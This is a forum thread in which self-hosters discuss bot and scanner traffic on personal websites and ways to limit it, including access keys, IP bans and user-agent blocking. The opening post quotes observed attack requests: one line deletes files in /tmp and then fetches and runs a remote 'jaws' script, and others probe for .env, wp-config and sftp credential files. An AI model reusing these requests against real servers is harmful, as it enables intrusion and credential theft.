World Wild Web > ✁ ∙ Web Crafting

how do you feel about website access?

(1/2) > >>

j:
daily, i get requests to my site like this:


--- Quote ---"GET / HTTP/1.1" 200 726 "-" "A company searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: email"

--- End quote ---

... and this:


--- Quote ---"GET /shell?cd+/tmp;rm+-rf+*;wget+IP/jaws;sh+/tmp/jaws HTTP/1.1"

--- End quote ---

sometimes i get blocks of requests from the same agent:


--- Quote ---"GET /.env HTTP/1.1"
"GET /wp-config.php.bak HTTP/1.1"
"GET /wp-config.php~ HTTP/1.1"
"GET /phpinfo.php HTTP/1.1"
"GET /info.php HTTP/1.1"
"GET /.vscode/sftp.json HTTP/1.1"
"GET /sftp-config.json HTTP/1.1"

--- End quote ---

... sent minutes apart, regardless of whether they get a 200.


the above doesn't particularly affect security, now that internet software behemoths like apache, nginx and lighttpd exist. yet these redundant requests can still hinder servers my friends run, where structures like dial-up still exist (or folks that use nearlyfreespeech.net!), and where the number of requests you receive matters as much as the amount of data that's being transferred. the web is still extraordinarily heavy compared to protocols like spartan, nex and justtext, and all of the folks i've spoken to that self-host have reported receiving the same requests as the above when i've asked them.

my answer to the above is to add walls to my site:

- visitors email me asking for access to the site and telling me a little bit about why they're interested in reading - a little bit of human connection!
- i respond with a key they can append to their URL which lets them see content (i.e. http://website.com?key=letmein)
- agents trying to access my domain have three lifetime do-overs - where they can make a bad request - before their IP is permanently blacklisted

this has worked pretty well with my code (which folks can email me for) at least.

how do other folks feel about this? do you think defending your website aligns with what the web is now; if so how would you approach mitigating the sheer amount of bloat and bots that scrape sites? would my approach deter you from visiting my site if it were implemented?

Melooon:
That's a fun solution, and it definitely opens the door for you to play with the idea a bit and make your site more unique! I assume if you're giving everyone personal access keys then you can also code the site to personalise itself to each key? Maybe make their name appear or allow them to have a favourite colour that changes the design  :grin: You could even make a personalised newsletter that emails them only things they haven't read.

Although.. I suppose on the flip side to that, you'd also have to track each personal access key to log what individuals are reading on your site  :tongue: (Im not denouncing this, used altruistically this is great info for any writer/blogged, but it does run the risk of spoiling the writers direction of interest! It may also deter some people from visiting.)

As far as I know the Neocities approach is to simply overwhelm bots with resources - e.g. if you have 500 visitors and 5000 bots, then you make your server able to handle 20,000 visitors/bots.

That's an approach I tend to try and replicate; I always make sure that there are at least 3x more resources than necessary since the pain of things going offline at a bad moment is more than the pain of providing the resources.

That's definitely not a good approach for anyone self-hosting on dialup or using a very low-power server; but for anyone using VPS hosting its a viable system. There is always a limit to the number of bots that can exist since they suffer exactly the same bandwidth limits web hosts do, so I suppose they will always balance each other out  :eyes:

brisray:
Just my tuppence worth, I find any sort of restriction on me viewing a website puts me off of it for a long time. I do sign up for sites, but only if they have enough viewable content to make me interested in what else they have.

Just some thoughts on traffic and bots in general...

The second you open a computer up on the web the bots will find it. I found that out over 20 years ago. They just don't crawl the sites, I've had automated attacks against both the web and FTP servers I run. Although I've hardened the servers as much as I can, I am certain I couldn't stop a determined attack against them.

I've been playing around with my old web logs, even in 2011, the oldest I've still got, bots were responsible for twice the number of visits as humans - well, almost all humans, it's hard to tell if I missed some. June 2011 - 8,449 pages (human) vs 17,476 (bots). It's only gotten worse October 2023 - 34,100 (human) vs 918,543 (bots).

The server (Apache) can easily cope with the traffic - I keep track of that as well, and my ISP hasn't complained about the bandwidth usage. If you're using dial-up then it might be a problem.

If the bots get too much, I'll send them off somewhere - maybe the black hole of 0.0.0.0 or a Japanese porn site or something.

The largest bot visits I get are my own fault. A startup penetration testing company made me an offer I couldn't refuse - free scans for life! Once a month they crawl every file on my largest site as well as poke around to see if they can get out of the server. Guess what my biggest security risk is? Making the logs and server status page public - too much information about what's going on behind the public face of the sites.

j:
i appreciate the ideas!


--- Quote from: Melooon ---... you can also code the site to personalise itself to each key?

--- End quote ---

that's a really good idea that i hadn't thought of - though i'll leave that up to somebody with a more creative site than i. i'm going to work on a minimalist webserver soon that incorporates the original idea so my code will be reachable somewhere eventually!

the approach i'm planning on taking is very bland and uncreative, but could be modified: i just plan on disconnecting the user without serving any data, given that i'm working with plain old TCP/IP. there'll be a tmpfile() somewhere that keeps track of requested 404s per device; when too many are requested they'll just be dropped, which saves a ton of resources!

i like the ideas and considerations, though :P

dirtnap:
on the actual problem: this isn't about palo alto's detested crawler, is it? the one that flagrantly ignores robots.txt?

are you not able to block access to your server according to user-agent? because frankly, if not, i'd say that's the bigger issue here. since this crawler's ua is comically recognisable, it should be possible to block any request containing the phrase "expanse, a palo alto", or for that matter probably just "palo alto".

i think blocking the offending crawler (whcih again, should be simple to do via the recognisable ua) is a much more reasonable response to the problem of one crawler requesting too much traffic than...denying everyone access to your site.

because in response to your final question:


--- Quote ---would my approach deter you from visiting my site if it were implemented?
--- End quote ---

i would think "well that's a novel way to harvest emails", close the tab, and forget about your site.

any site that requires me to do anything to view it beyond select a language loses my interest immediately. i'm certainly not handing over my email just to fucking read. i'm extremely tired of forums that require an account to view, and i'm certainly not making an account to view whatever your site is - and yes, requiring someone to send an email and get a unique key is in any functional sense making an account.

Navigation

[0] Message Index

[#] Next page

Go to full version